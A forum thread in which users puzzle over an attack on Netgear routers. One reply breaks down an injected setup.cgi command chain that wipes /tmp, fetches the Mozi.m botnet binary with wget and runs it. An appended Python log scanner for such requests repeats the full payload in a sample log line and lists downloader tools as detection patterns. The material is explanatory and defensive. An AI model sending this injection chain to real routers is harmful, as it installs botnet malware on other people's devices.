Forum Discussion
NetGear users...
It possibly does a bad thing...
- MarkJFine, 6 years ago, Professor
I'd bet on it.
- maratsade, 6 years ago, Distinguished Professor IV
My question is, because I'm not really well versed in all of this stuff, what it is they're doing. Are they trying to take control of the router? Make it be a kind of bot? Is it just simple hacking to get to personal info, or is it something more nefarious?
- MarkJFine, 6 years ago, Professor
Run setup.cgi using netgear.cfg, then run a shell consisting of the following commands:
1. rm -rf /tmp/* - delete everything in /tmp
2. wget 192.168.1.1:8088/Mozi.m -O /tmp/netgear - get 192.168.1.1:8088/Mozi.m as /tmp/netgear
3. sh netgear - run it...
curpath=/ - ...from root
currentsetting/htm=1 - no idea what that means.
According to https://www.digitalmunition.me/new-mozi-p2p-botnet-attacks-netgear-gpon-d-link-and-huawei-routers/ and https://blog.netlab.360.com/mozi-another-botnet-using-dht/, Mozi.m is a DHT point-2-point botnet.
The real question is how it's getting it to install. Is 192.168.1.1:8088 an exploit to mask the requester's own IP address and port, so it's actually telling the router to get it from the requesting IP?
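An added example, not part of the thread: a log check that flags setup.cgi requests whose parameters decode to a chain of shell commands like the one broken down above, and reports what the chain tries to download. The log lines are constructed and the parameter names p1/p2 are placeholders (assumptions); the check does not depend on them.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the thread). Parameter names p1/p2 are
# placeholders; detection looks only at decoded parameter values.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET /setup.cgi?p1=netgear.cfg&p2=rm+-rf+/tmp/*;wget+192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/ HTTP/1.0" 200 0',
    '198.51.100.4 - - [01/Jan/2020:10:00:05 +0000] "GET /index.htm HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2020:10:00:09 +0000] "GET /setup.cgi?p1=status.htm HTTP/1.1" 401 0',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SEPARATORS = re.compile(r';|&&|\|\||\||`|\n')   # ways to chain shell commands
DOWNLOADERS = {"wget", "curl", "tftp"}

def commands_in(value):
    """Split a decoded parameter value into shell commands, if it chains any."""
    parts = [p.strip() for p in SEPARATORS.split(value) if p.strip()]
    return parts if len(parts) > 1 else []

def fetched_from(command):
    """Return the download source of a wget/curl/tftp command, else None."""
    tokens = command.split()
    if not tokens or tokens[0] not in DOWNLOADERS:
        return None
    # Skip options and the output-file argument that follows -O / -o.
    args = [t for i, t in enumerate(tokens[1:], 1)
            if not t.startswith("-") and tokens[i - 1] not in ("-O", "-o")]
    return args[0] if args else None

def scan(lines):
    """Return one finding per setup.cgi parameter carrying chained commands."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.endswith("/setup.cgi"):
            continue
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            cmds = commands_in(unquote_plus(raw))   # '+' and %xx decoded first
            if cmds:
                sources = [s for s in map(fetched_from, cmds) if s]
                findings.append({"client": m.group(1), "param": name,
                                 "commands": cmds, "sources": sources})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `sources` field is the address the router was told to fetch from, which is the value to compare against the requesting client when working out where the payload is actually hosted.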